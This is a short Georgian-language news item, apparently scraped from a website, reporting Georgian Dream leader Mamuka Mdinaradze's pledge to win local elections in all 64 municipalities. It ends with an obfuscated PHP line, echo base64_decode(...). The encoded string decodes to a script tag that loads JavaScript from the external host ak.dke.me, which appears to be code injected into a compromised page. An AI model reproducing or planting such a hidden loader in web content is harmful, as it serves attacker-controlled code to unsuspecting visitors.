gorgia
ავერსი jaluzi

უახლოეს მომავალში დაიწყება მზადება არჩევნებისათვის, პირობას ვაძლევ საზოგადოებას, რომ “ქართული ოცნება” მოიპოვებს მეათე დამაჯერებელ გამარჯვებას - ჩვენი ოპონენტები დამარცხებისათვის არიან განწირულები, - ამის შესახებ „ქართული ოცნების“ აღმასრულებელმა მდივანმა, საპარლამენტო უმრავლესობის ლიდერმა მამუკა მდინარაძემ დღევანდელ ბრიფინგზე განაცხადა.

მდინარაძის თქმით, “ქართული ოცნება” არჩევნებისთვის მზადებას უახლოეს პერიოდში დაიწყებს.

როგორც მან ბრიფინგზე განაცხადა, მისი პარტიის განცხადებული მიზანია, 64-ვე მუნიციპალიტეტში არჩევნების მოგება და დამაჯერებელი გამარჯვება.

“ერთ-ერთი საინტერესო საკითხი არის თვითმმართველობის მოახლოებული არჩევნები. მომდევნო დღეებში ნამდვილად არა, მაგრამ უახლოეს მომავალში დაიწყება მზადება არჩევნებისათვის, რომელშიც ჩართული იქნება პარტიული სტრუქტურის ყველა რგოლი. ჩვენი გაცხადებული მიზანია, რომ 64-ვე მუნიციპალიტეტში მოვიგოთ არჩევნები როგორც მერის, ასევე საკრებულოს არჩევნებზეა საუბარი და გავიმარჯვოთ დამაჯერებლად, რისთვისაც, როგორც აღვნიშნე, უახლოეს პერიოდში დავიწყებთ მზადებას და პირობას ვაძლევ საზოგადოებას, რომ რიგით მე-10 არჩევნებში “ქართული ოცნება” მოიპოვებს მე-10 დამაჯერებელ გამარჯვებას.

ჯერ კიდევ არის დრო და ჩვენი ოპონენტები (ოპონენტებად თუ იწოდებიან) არ ვიცი, რა გადაწყვეტილებას მიიღებენ, მაგრამ, ნებისმიერ შემთხვევაში, ისინი დამარცხებისათვის არიან განწირულები, რადგან საქართველოში აგენტურული პარტიები ვეღარასდროს გაიმარჯვებენ”, - განაცხადა მამუკა მდინარაძემ.

159
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");